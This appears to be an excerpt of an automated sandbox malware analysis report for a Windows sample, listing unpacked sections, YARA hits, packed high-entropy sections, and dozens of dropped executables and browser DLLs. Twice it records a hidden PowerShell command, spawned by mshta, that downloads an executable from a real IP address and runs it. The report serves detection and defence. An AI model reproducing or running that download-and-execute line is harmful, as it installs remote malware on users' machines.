                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 7.2.skotes.exe.f50000.0.unpack :EW;.rsrc:W;.idata :W;ykgekexw:EW;prmmqeqz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ykgekexw:EW;prmmqeqz:EW;.taggant:EW;
                                    Source: C:\Users\user\Documents\HJEHIJEBKE.exeUnpacked PE file: 28.2.HJEHIJEBKE.exe.6c0000.0.unpack :EW;.rsrc:W;.idata :W;ykgekexw:EW;prmmqeqz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ykgekexw:EW;prmmqeqz:EW;.taggant:EW;
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeUnpacked PE file: 65.2.jyidkjkfhjawd.exe.880000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeUnpacked PE file: 72.2.483d2fa8a0d53818306efeb32d3.exe.c00000.0.unpack :EW;.rsrc:W;.idata :W;ykgekexw:EW;prmmqeqz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ykgekexw:EW;prmmqeqz:EW;.taggant:EW;
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeUnpacked PE file: 75.2.483d2fa8a0d53818306efeb32d3.exe.c00000.0.unpack :EW;.rsrc:W;.idata :W;ykgekexw:EW;prmmqeqz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ykgekexw:EW;prmmqeqz:EW;.taggant:EW;
                                    Source: Yara matchFile source: 19.2.f3d6f9fcfe.exe.400000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 24.2.f3d6f9fcfe.exe.400000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 19.0.f3d6f9fcfe.exe.400000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 44.2.f3d6f9fcfe.exe.400000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 24.0.f3d6f9fcfe.exe.400000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 56.0.f3d6f9fcfe.exe.400000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 39.2.f3d6f9fcfe.exe.400000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 44.0.f3d6f9fcfe.exe.400000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 56.2.f3d6f9fcfe.exe.400000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 61.0.f3d6f9fcfe.exe.400000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 39.0.f3d6f9fcfe.exe.400000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 61.2.f3d6f9fcfe.exe.400000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[2].exe, type: DROPPED
                                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                    Source: random[1].exe.18.drStatic PE information: 0xAAB116B5 [Thu Sep 30 01:13:25 2060 UTC]
                                    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                                    Source: random[4].exe.18.drStatic PE information: real checksum: 0x1ef104 should be: 0x1e7984
                                    Source: 522bb7a019.exe.18.drStatic PE information: real checksum: 0x147442 should be: 0x1ebf52
                                    Source: ad25d67005.exe.18.drStatic PE information: real checksum: 0x0 should be: 0x8816e
                                    Source: cbfb8a9c89.exe.18.drStatic PE information: real checksum: 0x0 should be: 0x9001
                                    Source: 64252d274d.exe.18.drStatic PE information: real checksum: 0x0 should be: 0x88ff0
                                    Source: HJEHIJEBKE.exe.3.drStatic PE information: real checksum: 0x32222a should be: 0x318e71
                                    Source: random[1].exe.18.drStatic PE information: real checksum: 0x0 should be: 0x9001
                                    Source: eO7MwvK[1].exe.18.drStatic PE information: real checksum: 0x147442 should be: 0x1ebf52
                                    Source: 95ba65f98f.exe.18.drStatic PE information: real checksum: 0x1c85bc should be: 0x1d1c8d
                                    Source: random[3].exe2.18.drStatic PE information: real checksum: 0x1d1368 should be: 0x1ce87e
                                    Source: random[1].exe.3.drStatic PE information: real checksum: 0x32222a should be: 0x318e71
                                    Source: 4c4716526e.exe.18.drStatic PE information: real checksum: 0x147442 should be: 0x1ebf52
                                    Source: random[1].exe0.18.drStatic PE information: real checksum: 0x0 should be: 0x88ff0
                                    Source: jyidkjkfhjawd.exe.29.drStatic PE information: real checksum: 0x0 should be: 0x13ab91
                                    Source: f3d6f9fcfe.exe.18.drStatic PE information: real checksum: 0x0 should be: 0x21d41
                                    Source: eO7MwvK.exe.18.drStatic PE information: real checksum: 0x147442 should be: 0x1ebf52
                                    Source: e18644e148.exe.18.drStatic PE information: real checksum: 0x1ef104 should be: 0x1e7984
                                    Source: f2a96255ac.exe.18.drStatic PE information: real checksum: 0x4fdcb4 should be: 0x4f90bd
                                    Source: ccb71f0bac.exe.18.drStatic PE information: real checksum: 0x2bd1e2 should be: 0x2bea10
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe.0.drStatic PE information: real checksum: 0x4fdcb4 should be: 0x4f90bd
                                    Source: random[2].exe0.18.drStatic PE information: real checksum: 0x0 should be: 0x21d41
                                    Source: random[3].exe0.18.drStatic PE information: real checksum: 0x4fdcb4 should be: 0x4f90bd
                                    Source: random[4].exe0.18.drStatic PE information: real checksum: 0x2bd1e2 should be: 0x2bea10
                                    Source: random[5].exe.18.drStatic PE information: real checksum: 0x0 should be: 0x8816e
                                    Source: 8663788bd2.exe.18.drStatic PE information: real checksum: 0x1d1368 should be: 0x1ce87e
                                    Source: EdYEXasNiR.exeStatic PE information: real checksum: 0x1cf397 should be: 0x1cdad2
                                    Source: 456YTTQ213T2RO9QAEYSNNZDL.exe.0.drStatic PE information: real checksum: 0x32222a should be: 0x318e71
                                    Source: 483d2fa8a0d53818306efeb32d3.exe.53.drStatic PE information: real checksum: 0x32222a should be: 0x318e71
                                    Source: random[3].exe.18.drStatic PE information: real checksum: 0x1c85bc should be: 0x1d1c8d
                                    Source: skotes.exe.5.drStatic PE information: real checksum: 0x32222a should be: 0x318e71
                                    Source: random[1].exe1.18.drStatic PE information: real checksum: 0x147442 should be: 0x1ebf52
                                    Source: random[3].exe1.18.drStatic PE information: real checksum: 0x147442 should be: 0x1ebf52
                                    Source: 0bf9323d7e.exe.18.drStatic PE information: real checksum: 0x441ce7 should be: 0x4464d8
                                    Source: random[4].exe1.18.drStatic PE information: real checksum: 0x441ce7 should be: 0x4464d8
                                    Source: EdYEXasNiR.exeStatic PE information: section name:
                                    Source: EdYEXasNiR.exeStatic PE information: section name: .idata
                                    Source: EdYEXasNiR.exeStatic PE information: section name:
                                    Source: EdYEXasNiR.exeStatic PE information: section name: ulqubmxb
                                    Source: EdYEXasNiR.exeStatic PE information: section name: cfocvtil
                                    Source: EdYEXasNiR.exeStatic PE information: section name: .taggant
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe.0.drStatic PE information: section name:
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe.0.drStatic PE information: section name: .idata
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe.0.drStatic PE information: section name: losjkhko
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe.0.drStatic PE information: section name: ybfttvsi
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe.0.drStatic PE information: section name: .taggant
                                    Source: 456YTTQ213T2RO9QAEYSNNZDL.exe.0.drStatic PE information: section name:
                                    Source: 456YTTQ213T2RO9QAEYSNNZDL.exe.0.drStatic PE information: section name: .idata
                                    Source: 456YTTQ213T2RO9QAEYSNNZDL.exe.0.drStatic PE information: section name: ykgekexw
                                    Source: 456YTTQ213T2RO9QAEYSNNZDL.exe.0.drStatic PE information: section name: prmmqeqz
                                    Source: 456YTTQ213T2RO9QAEYSNNZDL.exe.0.drStatic PE information: section name: .taggant
                                    Source: random[1].exe.3.drStatic PE information: section name:
                                    Source: random[1].exe.3.drStatic PE information: section name: .idata
                                    Source: random[1].exe.3.drStatic PE information: section name: ykgekexw
                                    Source: random[1].exe.3.drStatic PE information: section name: prmmqeqz
                                    Source: random[1].exe.3.drStatic PE information: section name: .taggant
                                    Source: HJEHIJEBKE.exe.3.drStatic PE information: section name:
                                    Source: HJEHIJEBKE.exe.3.drStatic PE information: section name: .idata
                                    Source: HJEHIJEBKE.exe.3.drStatic PE information: section name: ykgekexw
                                    Source: HJEHIJEBKE.exe.3.drStatic PE information: section name: prmmqeqz
                                    Source: HJEHIJEBKE.exe.3.drStatic PE information: section name: .taggant
                                    Source: freebl3.dll.3.drStatic PE information: section name: .00cfg
                                    Source: freebl3[1].dll.3.drStatic PE information: section name: .00cfg
                                    Source: mozglue.dll.3.drStatic PE information: section name: .00cfg
                                    Source: mozglue[1].dll.3.drStatic PE information: section name: .00cfg
                                    Source: msvcp140.dll.3.drStatic PE information: section name: .didat
                                    Source: msvcp140[1].dll.3.drStatic PE information: section name: .didat
                                    Source: nss3.dll.3.drStatic PE information: section name: .00cfg
                                    Source: nss3[1].dll.3.drStatic PE information: section name: .00cfg
                                    Source: softokn3.dll.3.drStatic PE information: section name: .00cfg
                                    Source: softokn3[1].dll.3.drStatic PE information: section name: .00cfg
                                    Source: skotes.exe.5.drStatic PE information: section name:
                                    Source: skotes.exe.5.drStatic PE information: section name: .idata
                                    Source: skotes.exe.5.drStatic PE information: section name: ykgekexw
                                    Source: skotes.exe.5.drStatic PE information: section name: prmmqeqz
                                    Source: skotes.exe.5.drStatic PE information: section name: .taggant
                                    Source: random[3].exe.18.drStatic PE information: section name:
                                    Source: random[3].exe.18.drStatic PE information: section name: .idata
                                    Source: random[3].exe.18.drStatic PE information: section name:
                                    Source: random[3].exe.18.drStatic PE information: section name: sxcdrnzu
                                    Source: random[3].exe.18.drStatic PE information: section name: zjhisqmh
                                    Source: random[3].exe.18.drStatic PE information: section name: .taggant
                                    Source: 95ba65f98f.exe.18.drStatic PE information: section name:
                                    Source: 95ba65f98f.exe.18.drStatic PE information: section name: .idata
                                    Source: 95ba65f98f.exe.18.drStatic PE information: section name:
                                    Source: 95ba65f98f.exe.18.drStatic PE information: section name: sxcdrnzu
                                    Source: 95ba65f98f.exe.18.drStatic PE information: section name: zjhisqmh
                                    Source: 95ba65f98f.exe.18.drStatic PE information: section name: .taggant
                                    Source: f2a96255ac.exe.18.drStatic PE information: section name:
                                    Source: f2a96255ac.exe.18.drStatic PE information: section name: .idata
                                    Source: f2a96255ac.exe.18.drStatic PE information: section name: losjkhko
                                    Source: f2a96255ac.exe.18.drStatic PE information: section name: ybfttvsi
                                    Source: f2a96255ac.exe.18.drStatic PE information: section name: .taggant
                                    Source: random[3].exe0.18.drStatic PE information: section name:
                                    Source: random[3].exe0.18.drStatic PE information: section name: .idata
                                    Source: random[3].exe0.18.drStatic PE information: section name: losjkhko
                                    Source: random[3].exe0.18.drStatic PE information: section name: ybfttvsi
                                    Source: random[3].exe0.18.drStatic PE information: section name: .taggant
                                    Source: random[4].exe.18.drStatic PE information: section name:
                                    Source: random[4].exe.18.drStatic PE information: section name: .idata
                                    Source: random[4].exe.18.drStatic PE information: section name:
                                    Source: random[4].exe.18.drStatic PE information: section name: rpnbigxq
                                    Source: random[4].exe.18.drStatic PE information: section name: yuihiqdq
                                    Source: random[4].exe.18.drStatic PE information: section name: .taggant
                                    Source: ccb71f0bac.exe.18.drStatic PE information: section name:
                                    Source: ccb71f0bac.exe.18.drStatic PE information: section name: .idata
                                    Source: ccb71f0bac.exe.18.drStatic PE information: section name: kzgpmlwq
                                    Source: ccb71f0bac.exe.18.drStatic PE information: section name: pvwipuxs
                                    Source: ccb71f0bac.exe.18.drStatic PE information: section name: .taggant
                                    Source: random[4].exe0.18.drStatic PE information: section name:
                                    Source: random[4].exe0.18.drStatic PE information: section name: .idata
                                    Source: random[4].exe0.18.drStatic PE information: section name: kzgpmlwq
                                    Source: random[4].exe0.18.drStatic PE information: section name: pvwipuxs
                                    Source: random[4].exe0.18.drStatic PE information: section name: .taggant
                                    Source: 0bf9323d7e.exe.18.drStatic PE information: section name:
                                    Source: 0bf9323d7e.exe.18.drStatic PE information: section name: .idata
                                    Source: 0bf9323d7e.exe.18.drStatic PE information: section name:
                                    Source: 0bf9323d7e.exe.18.drStatic PE information: section name: habslsfa
                                    Source: 0bf9323d7e.exe.18.drStatic PE information: section name: xrpgpkiv
                                    Source: 0bf9323d7e.exe.18.drStatic PE information: section name: .taggant
                                    Source: random[4].exe1.18.drStatic PE information: section name:
                                    Source: random[4].exe1.18.drStatic PE information: section name: .idata
                                    Source: random[4].exe1.18.drStatic PE information: section name:
                                    Source: random[4].exe1.18.drStatic PE information: section name: habslsfa
                                    Source: random[4].exe1.18.drStatic PE information: section name: xrpgpkiv
                                    Source: random[4].exe1.18.drStatic PE information: section name: .taggant
                                    Source: e18644e148.exe.18.drStatic PE information: section name:
                                    Source: e18644e148.exe.18.drStatic PE information: section name: .idata
                                    Source: e18644e148.exe.18.drStatic PE information: section name:
                                    Source: e18644e148.exe.18.drStatic PE information: section name: rpnbigxq
                                    Source: e18644e148.exe.18.drStatic PE information: section name: yuihiqdq
                                    Source: e18644e148.exe.18.drStatic PE information: section name: .taggant
                                    Source: random[3].exe2.18.drStatic PE information: section name:
                                    Source: random[3].exe2.18.drStatic PE information: section name: .idata
                                    Source: random[3].exe2.18.drStatic PE information: section name:
                                    Source: random[3].exe2.18.drStatic PE information: section name: yxdjfvbh
                                    Source: random[3].exe2.18.drStatic PE information: section name: qblkshbo
                                    Source: random[3].exe2.18.drStatic PE information: section name: .taggant
                                    Source: 8663788bd2.exe.18.drStatic PE information: section name:
                                    Source: 8663788bd2.exe.18.drStatic PE information: section name: .idata
                                    Source: 8663788bd2.exe.18.drStatic PE information: section name:
                                    Source: 8663788bd2.exe.18.drStatic PE information: section name: yxdjfvbh
                                    Source: 8663788bd2.exe.18.drStatic PE information: section name: qblkshbo
                                    Source: 8663788bd2.exe.18.drStatic PE information: section name: .taggant
                                    Source: random[2].exe0.18.drStatic PE information: section name: .code
                                    Source: f3d6f9fcfe.exe.18.drStatic PE information: section name: .code
                                    Source: random[2].exe1.18.drStatic PE information: section name: .fptable
                                    Source: 696689ce6d.exe.18.drStatic PE information: section name: .fptable
                                    Source: jyidkjkfhjawd.exe.29.drStatic PE information: section name:
                                    Source: jyidkjkfhjawd.exe.29.drStatic PE information: section name:
                                    Source: jyidkjkfhjawd.exe.29.drStatic PE information: section name:
                                    Source: jyidkjkfhjawd.exe.29.drStatic PE information: section name:
                                    Source: jyidkjkfhjawd.exe.29.drStatic PE information: section name:
                                    Source: 483d2fa8a0d53818306efeb32d3.exe.53.drStatic PE information: section name:
                                    Source: 483d2fa8a0d53818306efeb32d3.exe.53.drStatic PE information: section name: .idata
                                    Source: 483d2fa8a0d53818306efeb32d3.exe.53.drStatic PE information: section name: ykgekexw
                                    Source: 483d2fa8a0d53818306efeb32d3.exe.53.drStatic PE information: section name: prmmqeqz
                                    Source: 483d2fa8a0d53818306efeb32d3.exe.53.drStatic PE information: section name: .taggant
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeCode function: 5_2_00E8D91C push ecx; ret 5_2_00E8D92F
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeCode function: 5_2_00E81359 push es; ret 5_2_00E8135A
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00F6D91C push ecx; ret 6_2_00F6D92F
                                    Source: EdYEXasNiR.exeStatic PE information: section name: entropy: 7.9828338445910125
                                    Source: EdYEXasNiR.exeStatic PE information: section name: ulqubmxb entropy: 7.955389523438137
                                    Source: 456YTTQ213T2RO9QAEYSNNZDL.exe.0.drStatic PE information: section name: entropy: 7.081780025597735
                                    Source: random[1].exe.3.drStatic PE information: section name: entropy: 7.081780025597735
                                    Source: HJEHIJEBKE.exe.3.drStatic PE information: section name: entropy: 7.081780025597735
                                    Source: skotes.exe.5.drStatic PE information: section name: entropy: 7.081780025597735
                                    Source: random[3].exe.18.drStatic PE information: section name: entropy: 7.971055294478886
                                    Source: random[3].exe.18.drStatic PE information: section name: sxcdrnzu entropy: 7.953189916580493
                                    Source: 95ba65f98f.exe.18.drStatic PE information: section name: entropy: 7.971055294478886
                                    Source: 95ba65f98f.exe.18.drStatic PE information: section name: sxcdrnzu entropy: 7.953189916580493
                                    Source: random[4].exe.18.drStatic PE information: section name: rpnbigxq entropy: 7.949233459826734
                                    Source: 0bf9323d7e.exe.18.drStatic PE information: section name: habslsfa entropy: 7.95460581651071
                                    Source: random[4].exe1.18.drStatic PE information: section name: habslsfa entropy: 7.95460581651071
                                    Source: e18644e148.exe.18.drStatic PE information: section name: rpnbigxq entropy: 7.949233459826734
                                    Source: random[3].exe2.18.drStatic PE information: section name: entropy: 7.988197152861534
                                    Source: random[3].exe2.18.drStatic PE information: section name: yxdjfvbh entropy: 7.953581834436191
                                    Source: 8663788bd2.exe.18.drStatic PE information: section name: entropy: 7.988197152861534
                                    Source: 8663788bd2.exe.18.drStatic PE information: section name: yxdjfvbh entropy: 7.953581834436191
                                    Source: jyidkjkfhjawd.exe.29.drStatic PE information: section name: entropy: 7.997518573935155
                                    Source: jyidkjkfhjawd.exe.29.drStatic PE information: section name: entropy: 7.831462667091339
                                    Source: jyidkjkfhjawd.exe.29.drStatic PE information: section name: entropy: 7.983042351633134
                                    Source: jyidkjkfhjawd.exe.29.drStatic PE information: section name: entropy: 7.881268733146465
                                    Source: jyidkjkfhjawd.exe.29.drStatic PE information: section name: .data entropy: 7.981738077290403
                                    Source: 483d2fa8a0d53818306efeb32d3.exe.53.drStatic PE information: section name: entropy: 7.081780025597735

                                    Persistence and Installation Behavior

                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile created: C:\Users\user\Documents\HJEHIJEBKE.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeProcess created: "C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe"
                                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                    Source: C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\AutoIt3_x64.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\msvcp140[1].dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[4].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1027574001\eO7MwvK.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\_ssl.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\mfcm90.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1027575001\e18644e148.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[2].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\msvcr90.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[3].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1027568001\8663788bd2.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\random[4].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\win32event.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\mozglue[1].dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\mfcm90u.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B8DE7T9Q\random[2].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\random[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\select.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\msvcp140.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1027570001\85c59433f4.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\win32process.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\vcruntime140[1].dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\mpc\41678903251236549780Jump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\random[3].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\nss3[1].dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1027577001\ad25d67005.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\mfc90u.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1027567001\95ba65f98f.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\_tkinter.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[3].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\softokn3[1].dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[5].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\unicodedata.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\_hashlib.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeFile created: C:\wOXcVegx\jyidkjkfhjawd.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\win32trace.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1027569001\f2a96255ac.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\tk85.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\msvcm90.dllJump to dropped file
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeFile created: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\bz2.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\eIgpINK[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[4].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B8DE7T9Q\eO7MwvK[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B8DE7T9Q\random[3].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\win32api.pydJump to dropped file
